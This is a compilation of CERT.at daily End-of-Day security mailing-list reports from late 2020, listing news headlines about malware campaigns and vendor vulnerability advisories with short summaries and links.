Security updates have been issued by Arch Linux (ceph, gitea, matrix-synapse, musl, mutt, neomutt, opensc, and webkit2gtk), Debian (debian-security-support, openldap, salt, xen, and xorg-server), Fedora (fossil, pdfresurrect, tcpdump, thunderbird, and xorg-x11-server), Gentoo (chromium, firefox, mariadb, pam, postgresql, seamonkey, thunderbird, and xorg-server), Mageia (mutt, pdfresurrect, privoxy, and thunderbird), openSUSE (chromium, java-1_8_0-openjdk, kernel, minidlna, neomutt, opera, [...]
---------------------------------------------
https://lwn.net/Articles/839198/
∗∗∗ HPE HP-UX: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1199
∗∗∗ Security Bulletin: Vulnerability in PyYAML affects IBM Spectrum Protect Plus Container and Microsoft File Systems Agents (CVE-2020-1747) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pyyaml-a…
∗∗∗ Security Bulletin: Denial of Service Vulnerability in Chart.js affects IBM Spectrum Protect Plus (CVE-2020-7746) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera…
∗∗∗ Security Bulletin: Upgrade to IBP v2.5.1 to address recent concerns/issues with Golang versions other than 1.14.7 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-upgrade-to-ibp-v2-5-1-to-…
∗∗∗ Security Bulletin: Vulnerability in Urllib3 affects IBM Spectrum Protect Container and Microsoft File Systems Agents (CVE-2020-26137) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-urllib3-…
∗∗∗ Public Service Announcement ∗∗∗
---------------------------------------------
Due to Dec 8 being a public holiday in Austria, the next End-of-Day report will be published on Dec 9.
---------------------------------------------
https://en.wikipedia.org/wiki/Feast_of_the_Immaculate_Conception
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 03-12-2020 18:00 − Friday 04-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Attention! Amazon phishing emails are booming right now! ∗∗∗
---------------------------------------------
Black Friday is over, Christmas is around the corner, and Austria is still in lockdown. All of these are reasons why online retail is currently booming; fraudulent messages sent in Amazon's name are booming just as much. Emails are currently circulating in which fraudsters pretend that you have been charged twice in order to get hold of your data.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-amazon-phishing-mails-boomen…
∗∗∗ Malware for stealing financial data hides behind social media buttons ∗∗∗
---------------------------------------------
The buttons supposedly allow content to be shared via Facebook, Twitter and Instagram. Instead, they activate malicious code that targets personal information and credit card data. The associated malware has been in circulation since the end of September.
---------------------------------------------
https://www.zdnet.de/88390301/malware-fuer-den-diebstahl-von-finanzdaten-ve…
∗∗∗ Cybercrime: Trickbot learns a new trick ∗∗∗
---------------------------------------------
Emotet infections will become even more dangerous in the future, because the malware it downloads could lodge itself in the BIOS.
---------------------------------------------
https://heise.de/-4980197
∗∗∗ Researchers warn of a partly still unpatched vulnerability in various Android apps ∗∗∗
---------------------------------------------
The formerly vulnerable Play Core library, already fixed by Google in March, has not (yet) been actively updated by some app developers.
---------------------------------------------
https://heise.de/-4979478
∗∗∗ The chronicles of Emotet ∗∗∗
---------------------------------------------
More than six years have passed since the banking Trojan Emotet was first detected. During this time it has repeatedly mutated, changed direction, acquired partners, picked up modules, and generally been the cause of high-profile incidents and multimillion-dollar losses.
---------------------------------------------
https://securelist.com/the-chronicles-of-emotet/99660/
∗∗∗ Leaking Browser URL/Protocol Handlers ∗∗∗
---------------------------------------------
An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target.
---------------------------------------------
https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-…
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware Releases Security Updates to Address CVE-2020-4006 ∗∗∗
---------------------------------------------
VMware has released security updates to address a vulnerability—CVE-2020-4006—in VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector. An attacker could exploit this vulnerability to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0027.2 and apply the necessary updates.
---------------------------------------------
https://us-cert.cisa.gov/ncas/current-activity/2020/12/03/vmware-releases-s…
∗∗∗ Web server vulnerability: Sensitive configuration and status data published ∗∗∗
---------------------------------------------
Misconfigured web servers of federal agencies and IT companies exposed visitor IPs, usernames, meeting IDs and more openly on the internet.
---------------------------------------------
https://heise.de/-4971830
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (thunderbird), Fedora (c-ares, pdfresurrect, webkit2gtk3, and xen), openSUSE (python3), SUSE (gdm, python-pip, rpmlint, and xen), and Ubuntu (snapcraft).
---------------------------------------------
https://lwn.net/Articles/838960/
∗∗∗ WECON LeviStudioU (Update C) ∗∗∗
---------------------------------------------
This updated advisory is a follow-up to the advisory update titled ICSA-20-238-03 WECON LeviStudioU (Update B) that was published October 29, 2020, to the ICS webpage on us-cert.cisa.gov. This advisory contains mitigations for a Stack-based Buffer Overflow vulnerability in the WECON Technology LeviStudioU software.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-238-03
∗∗∗ Apache Tomcat: Vulnerability allows disclosure of information ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1195
∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202…
∗∗∗ Security Advisory - Resource Management Error Vulnerability in Huawei CloudEngine 1800V Product ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202…
∗∗∗ Intel CPU vulnerability CVE-2020-0591 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K82356391
∗∗∗ Intel CPU vulnerability CVE-2020-0592 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K04160444
∗∗∗ QEMU vulnerability CVE-2020-27617 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K41142448
∗∗∗ Jetty vulnerability CVE-2019-10247 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K41412302
∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Program Management (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af…
∗∗∗ Security Bulletin: Trusteer Mobile SDK is vulnerable to CVE-2019-17362 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-trusteer-mobile-sdk-is-vu…
∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Sourcing (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af…
∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Contract Management (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af…
∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Spend Analysis (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af…
∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Watson Explorer and Watson Explorer Content Analytics Studio (CVE-2020-14579, CVE-2020-14578, CVE-2020-14577, CVE-2020-14621) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af…
∗∗∗ Security Bulletin: Multiple security vulnerabilities with IBM Content Navigator component in IBM Business Automation Workflow – CVE-2020-4687, CVE-2020-4760, CVE-2020-4704 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Upgrade javaenv:2.2 to address Gradle oauth authentication concerns. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-upgrade-javaenv2-2-to-add…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 02-12-2020 18:00 − Thursday 03-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ APT groups: Turla and co. disguise attacks as seemingly harmless activity ∗∗∗
---------------------------------------------
Espionage malware from the presumably state-funded Turla gang relies on Dropbox for data theft. In another case, coin mining concealed something worse.
---------------------------------------------
https://heise.de/-4978541
∗∗∗ Study: Vulnerabilities in open-source software typically go undetected for four years ∗∗∗
---------------------------------------------
Patches are usually available within four weeks. In addition, only 17 percent of registered vulnerabilities are to be classified as "malicious". GitHub regards open-source software as "critical infrastructure".
---------------------------------------------
https://www.zdnet.de/88390280/studie-schwachstellen-in-open-source-software…
∗∗∗ What did DeathStalker hide between two ferns? ∗∗∗
---------------------------------------------
While tracking DeathStalker’s Powersing-based activities in May 2020, we detected a previously unknown implant that leveraged DNS over HTTPS as a C2 channel, as well as parts of its delivery chain. We named this new malware "PowerPepper".
---------------------------------------------
https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/
∗∗∗ Xerox DocuShare Bugs Allow Data Leaks ∗∗∗
---------------------------------------------
CISA warns the leading enterprise document management platform is open to attack and urges companies to apply fixes.
---------------------------------------------
https://threatpost.com/xerox-docushare-bugs/161791/
∗∗∗ Another LILIN DVR 0-day being used to spread Mirai ∗∗∗
---------------------------------------------
In March, we reported[1] that multiple botnets, including Chalubo, Fbot, Moobot were using the same 0-day vulnerability to attack LILIN DVR devices, the vendor soon fixed the vulnerability. On August 26, 2020, our Anglerfish honeypot detected that another new LILINDVR/ [...]
---------------------------------------------
https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mi…
∗∗∗ Adventures in Anti-Gravity (Part II) ∗∗∗
---------------------------------------------
Here we continue to deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces), focusing on its Electron component.
---------------------------------------------
https://objective-see.com/blog/blog_0x5C.html
∗∗∗ TrickBot Malware Gets UEFI/BIOS Bootkit Feature to Remain Undetected ∗∗∗
---------------------------------------------
TrickBot, one of the most notorious and adaptable malware botnets in the world, is expanding its toolset to set its sights on firmware vulnerabilities to potentially deploy bootkits and take complete control of an infected system. The new functionality, dubbed "TrickBoot" by Advanced Intelligence (AdvIntel) and Eclypsium, makes use of readily available tools to check devices for well-known [...]
---------------------------------------------
https://thehackernews.com/2020/12/trickbot-malware-gets-uefibios-bootkit.ht…
∗∗∗ Spamhaus Intelligence API: Free threat intelligence data for security developers ∗∗∗
---------------------------------------------
Spamhaus Technology releases its Intelligence API. This is the first time Spamhaus has released its extensive threat intelligence via API, providing enriched data relating to IP addresses exhibiting compromised behaviour. Available free of charge, developers can readily access enhanced data that catalogues IP addresses compromised by malware, worms, Trojan infections, devices controlled by botnets, and third party exploits, such as open proxies. The API features live and historical data, [...]
---------------------------------------------
https://www.helpnetsecurity.com/2020/12/03/spamhaus-intelligence-api/
∗∗∗ Open Source Tool Helps Secure Siemens PCS 7 Control Systems ∗∗∗
---------------------------------------------
Industrial cybersecurity company OTORIO has released an open source tool designed to help organizations harden Siemens’ SIMATIC PCS 7 distributed control systems (DCS).
---------------------------------------------
https://www.securityweek.com/open-source-tool-helps-secure-siemens-pcs-7-co…
=====================
= Vulnerabilities =
=====================
∗∗∗ Google Play Apps Remain Vulnerable to High-Severity Flaw ∗∗∗
---------------------------------------------
Patches for a flaw (CVE-2020-8913) in the Google Play Core Library have not been implemented by several popular Google Play apps, including Cisco Teams and Edge.
---------------------------------------------
https://threatpost.com/google-play-apps-remain-vulnerable-to-high-severity-…
∗∗∗ iCloud for Windows 11.5 ∗∗∗
---------------------------------------------
Foundation: A local user may be able to read arbitrary files
ImageIO: Processing a maliciously crafted image may lead to arbitrary code execution
ImageIO: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution
libxml2: Processing maliciously crafted web content may lead to code execution
libxml2: A remote attacker may be able to cause unexpected application termination or arbitrary code execution
libxml2: Processing a maliciously crafted file may lead to arbitrary code execution
SQLite: A remote attacker may be able to cause a denial of service
SQLite: A remote attacker may be able to cause arbitrary code execution
SQLite: A remote attacker may be able to leak memory
SQLite: A maliciously crafted SQL query may lead to data corruption
WebKit: Processing maliciously crafted web content may lead to arbitrary code execution
---------------------------------------------
https://support.apple.com/kb/HT211935
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Mageia (cimg, pngcheck, poppler, tor, and xdg-utils), openSUSE (mariadb), Red Hat (go-toolset-1.14-golang), and Ubuntu (linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon).
---------------------------------------------
https://lwn.net/Articles/838870/
∗∗∗ Mozilla Foundation Security Advisory 2020-53 ∗∗∗
---------------------------------------------
In security advisory 2020-53, the Mozilla Foundation describes a stack overflow vulnerability (CVE-2020-26970) patched in Thunderbird 78.5.1. The issue was caused by writing an SMTP server status integer value on the stack designed to only hold one byte. This could potentially corrupt the stack which might be exploitable.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/0f933021879b159a96ec2380843…
∗∗∗ Red Hat Enterprise Linux: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1190
∗∗∗ Security Bulletin: Vulnerability in PyYAML affects IBM Spectrum Protect Plus Container and Microsoft File Systems Agents (CVE-2020-1747) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pyyaml-a…
∗∗∗ Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a 3rd party cryptographic vulnerability (CVE-2020-4254) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-big…
∗∗∗ Security Bulletin: A security bypass vulnerability in Apache Solr (lucene) affects IBM InfoSphere Information Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-bypass-vulnera…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple security vulnerabilities with Administration Console for Content Platform Engine component in IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4447, CVE-2020-4759 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 01-12-2020 18:00 − Wednesday 02-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Project Zero: Exploit demonstrates complete takeover of iPhones via Wi-Fi ∗∗∗
---------------------------------------------
Without a bug fix, iPhones could have been completely read out via Wi-Fi, through a trivial vulnerability. Apple has already fixed the bug.
---------------------------------------------
https://www.golem.de/news/project-zero-exploit-zeigt-komplettuebernahme-von…
∗∗∗ "Free" Symchanger Malware Tricks Users Into Installing Backdoor ∗∗∗
---------------------------------------------
In a previous post, I discussed how attackers can trick website owners into installing malware onto a website - granting the attacker the same unauthorized access as if they had exploited a vulnerability or compromised login details for the website. But did you know attackers use the same tactic against other bad actors? They do this by offering free malware, even going to great lengths to include a guide on how to use it.
---------------------------------------------
https://blog.sucuri.net/2020/12/free-symchanger-malware-tricks-users-into-i…
∗∗∗ Remote code execution: Vulnerabilities in Qnap's NAS operating system QTS closed ∗∗∗
---------------------------------------------
The Qnap developers have released a hardened version of QTS for the company's own NAS devices.
---------------------------------------------
https://heise.de/-4977592
∗∗∗ Package manager npm: Remote access Trojan disguises itself as a JSON tool ∗∗∗
---------------------------------------------
The two packages jdb.js and db-json.js try to install njRAT and to open the Windows firewall accordingly.
---------------------------------------------
https://heise.de/-4977572
∗∗∗ Numerous fraudulent job offers from rareAI and enixAI online! ∗∗∗
---------------------------------------------
"Career changer in AI training" or "Data entry clerk/AI trainer": this is roughly how the fraudulent job offers currently advertised on numerous platforms sound. Behind them are the supposed start-ups rareAI and enixAI. But the companies neither exist, nor do applicants receive paid work. Instead, the application process is used to open an account in the victims' name, and on the side the criminals also steal [...]
---------------------------------------------
https://www.watchlist-internet.at/news/zahlreiche-betruegerische-jobangebot…
=====================
= Vulnerabilities =
=====================
∗∗∗ ICS Advisory (ICSA-20-336-01) Schneider Electric EcoStruxure Operator Terminal Expert runtime (Vijeo XD) ∗∗∗
---------------------------------------------
Successful exploitation of this vulnerability may allow unauthorized command execution by a local user of the Windows engineering workstation, which could result in loss of availability, confidentiality, and integrity of the workstation where EcoStruxure Operator Terminal Expert runtime is installed.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-336-01
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (brotli, jupyter-notebook, and postgresql-9.6), Fedora (perl-Convert-ASN1 and php-pear), openSUSE (go1.15, libqt5-qtbase, mutt, python-setuptools, and xorg-x11-server), Oracle (firefox, kernel, libvirt, and thunderbird), Red Hat (rh-postgresql10-postgresql and rh-postgresql12-postgresql), SUSE (java-1_8_0-openjdk, python, python-cryptography, python-setuptools, python3, and xorg-x11-server), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-oracle, linux-raspi, linux, linux-aws, linux-azure, linux-kvm, linux-lts-trusty, linux-raspi2, linux-snapdragon, python-werkzeug, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04).
---------------------------------------------
https://lwn.net/Articles/838786/
∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202…
∗∗∗ HCL Domino: Vulnerability allows execution of arbitrary code with the privileges of the service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1182
∗∗∗ FreeBSD: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1185
∗∗∗ McAfee Total Protection: Vulnerability allows privilege escalation ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1184
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java SDK affect IBM Virtualization Engine TS7700 – July 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in firmware supporting products shipped with IBM Cloud Pak System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: CVE-2020-26217 XStream before version 1.4.14 is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-26217-xstream-be…
∗∗∗ Security Bulletin: Multiple security vulnerabilities with Administration Console for Content Platform Engine component in IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4447, CVE-2020-4459 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 30-11-2020 18:00 − Tuesday 01-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Banking malware Gootkit is back and is targeting PCs in Germany ∗∗∗
---------------------------------------------
CERT-Bund and various security researchers warn of Trojan attacks. However, infections are not readily possible.
---------------------------------------------
https://heise.de/-4976043
∗∗∗ FBI warns of BEC scammers using email auto-forwarding in attacks ∗∗∗
---------------------------------------------
The FBI is warning U.S. companies about scammers actively abusing auto-forwarding rules on web-based email clients to increase the likelihood of successful Business Email Compromise (BEC) attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-warns-of-bec-scammers-us…
∗∗∗ Critical Oracle WebLogic flaw actively exploited by DarkIRC malware ∗∗∗
---------------------------------------------
A botnet known as DarkIRC is actively targeting thousands of exposed Oracle WebLogic servers in attacks designed to exploit the CVE-2020-14882 remote code execution (RCE) vulnerability fixed by Oracle two months ago.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-oracle-weblogic-fla…
∗∗∗ IceRat evades antivirus by running PHP on Java VM ∗∗∗
---------------------------------------------
IceRat keeps low detections rates for weeks by using an unusual language implementation: JPHP. But there are more reasons than the choice of the compiler. This article explores IceRat and explains a way to analyze JPHP malware.
---------------------------------------------
https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
∗∗∗ How prevalent is DNS spoofing? Could a repeat of the Dyn/Mirai DDoS attack have the same results? ∗∗∗
---------------------------------------------
Two separate groups of academics have recently released research papers based on research into the Domain Name System (DNS). One has found that the overwhelming majority of popular site operators haven’t learned from the 2016 Dyn/Mirai incident/attack and set up a backup DNS server, and the other has shown that the rate of DNS spoofing, though still very small, has more than doubled in less than seven years.
---------------------------------------------
https://www.helpnetsecurity.com/2020/12/01/dns-spoofing/
∗∗∗ Xanthe - Docker aware miner ∗∗∗
---------------------------------------------
Ransomware attacks and big-game hunting are making the headlines, but adversaries use plenty of other methods to monetize their efforts in less intrusive ways. Cisco Talos recently discovered a cryptocurrency-mining botnet attack we're calling "Xanthe," which attempted to compromise one of Cisco's security honeypots for tracking Docker-related threats.
---------------------------------------------
https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html
∗∗∗ Docker malware is now common, so devs need to take Docker security seriously ∗∗∗
---------------------------------------------
Three years after the first malware attacks targeting Docker, developers are still misconfiguring and exposing their Docker servers online.
---------------------------------------------
https://www.zdnet.com/article/docker-malware-is-now-common-so-devs-need-to-…
=====================
= Vulnerabilities =
=====================
∗∗∗ GO SMS Pro Vulnerable to File Theft: Part 2 ∗∗∗
---------------------------------------------
Last week we released an advisory about an SMS app called GO SMS Pro. Media files sent via text in the app are stored insecurely on a publicly accessible server. With some very minor scripting, it is trivial to throw a wide net around that content. While it's not directly possible to link the media to specific users, those media files with faces, names, or other identifying characteristics do that for you. [...] It seems like GOMO is attempting to fix the issue, but a complete fix is still not available in the app.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/go-sms-pro-…
∗∗∗ Multiple (RCE) Vulnerabilities in Micro Focus Operations Bridge Manager ∗∗∗
---------------------------------------------
After analysing OBM, I found a mountain of critical security vulnerabilities that when combined result in a complete compromise of the application:
- Use of Hard-coded Credentials
- Insecure Java Deserialization (an incredible total of 41 of them)
- Use of Outdated and Insecure Java Libraries
- Incorrect Default Folder Permissions (resulting in Privilege Escalation to SYSTEM)
All of these vulnerabilities affect the latest version, 2020.05, and possibly earlier versions. Both Windows and Linux installations are affected, except for the privilege escalation, which only affects Windows.
---------------------------------------------
https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focu…
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2020-0009 ∗∗∗
---------------------------------------------
Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. [...]
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
---------------------------------------------
https://webkitgtk.org/security/WSA-2020-0009.html
∗∗∗ QNAP QTS: Multiple vulnerabilities allow code execution ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1181
∗∗∗ Foxit Phantom PDF Suite: Vulnerability allows unspecified attack ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1180
∗∗∗ HCL Domino: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1177
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Information disclosure vulnerability may affect IBM Business Automation Workflow – CVE-2020-4900 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: Node.js upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-node-js-upgrade-for-ibm-c…
∗∗∗ Security Bulletin: Node.js module upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-node-js-module-upgrade-fo…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in IBM WebSphere Application Server affects IBM Voice Gateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: A security vulnerability in Node.js affects IBM Voice Gateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Node.js upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-node-js-upgrade-for-ibm-c…
∗∗∗ Security Bulletin: Multiple security vulnerabilities in IBM Java SDK affects IBM Voice Gateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: IBM® Db2® could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. (CVE-2020-4739) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-could-allow-a-loc…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 27-11-2020 18:00 − Monday 30-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Bug or Feature: Privilege Escalation in Windows Autopilot ∗∗∗
---------------------------------------------
SEC Consult has identified a vulnerability in the Windows Autopilot deployment process that allows local privilege escalation.
---------------------------------------------
https://www.sec-consult.com/./blog/2020/11/bug-oder-feature-privilege-escal…
∗∗∗ Credit card skimmer fills fake PayPal forms with stolen order info ∗∗∗
---------------------------------------------
A newly discovered credit card skimmer uses an innovative technique to inject highly convincing PayPal iframes and hijack the checkout process on compromised online stores.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/credit-card-skimmer-fills-fa…
∗∗∗ Cyberthreats to financial organizations in 2021 ∗∗∗
---------------------------------------------
Let us review the forecasts we made at the end of 2019 and see how accurate we were. Then we will go through the key events of 2020 relating to financial attacks. Finally, we need to make a forecast of financial attacks in 2021.
---------------------------------------------
https://securelist.com/cyberthreats-to-financial-organizations-in-2021/9959…
∗∗∗ Threat Hunting with JARM, (Fri, Nov 27th) ∗∗∗
---------------------------------------------
Recently I have been testing a new tool created by the people at Salesforce. The tool is called JARM and what it does is query TLS instances (HTTPS servers and services) to create a fingerprint of their TLS configuration. Much like analyzing the nuances of network traffic can be used to fingerprint the operating system and version of a server, JARM fingerprints TLS instances to create a fingerprint which can be used to compare one TLS service to another.
---------------------------------------------
https://isc.sans.edu/diary/rss/26832
∗∗∗ German users targeted with Gootkit banker or REvil ransomware ∗∗∗
---------------------------------------------
After a noted absence, the Gootkit banking Trojan returns en masse to hit Germany. In an interesting twist, some of the victims may receive ransomware instead.
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted…
∗∗∗ SD-WAN Product Vulnerabilities Allow Hackers to Steer Traffic, Shut Down Networks ∗∗∗
---------------------------------------------
Researchers at cybersecurity consulting firm Realmode Labs have identified vulnerabilities in SD-WAN products from Silver Peak, Cisco, Citrix and VMware, including potentially serious flaws that can be exploited to steer traffic or completely shut down an organization’s network.
---------------------------------------------
https://www.securityweek.com/sd-wan-product-vulnerabilities-allow-hackers-s…
∗∗∗ Tens of Dormant North American Networks Suspiciously Resurrected at Once ∗∗∗
---------------------------------------------
More than fifty networks in the North American region suddenly burst to life after being dormant for a long period of time, Spamhaus reveals. The Geneva-based international nonprofit organization is focused on tracking spam, phishing, malware, and botnets, and provides threat intelligence that can help filter spam and related threats.
---------------------------------------------
https://www.securityweek.com/tens-dormant-north-american-networks-suspiciou…
∗∗∗ Hackers are targeting MacOS users with this updated malware ∗∗∗
---------------------------------------------
Researchers link new malware attacks designed to install a backdoor onto compromised systems to Vietnamese-backed hacking operation OceanLotus.
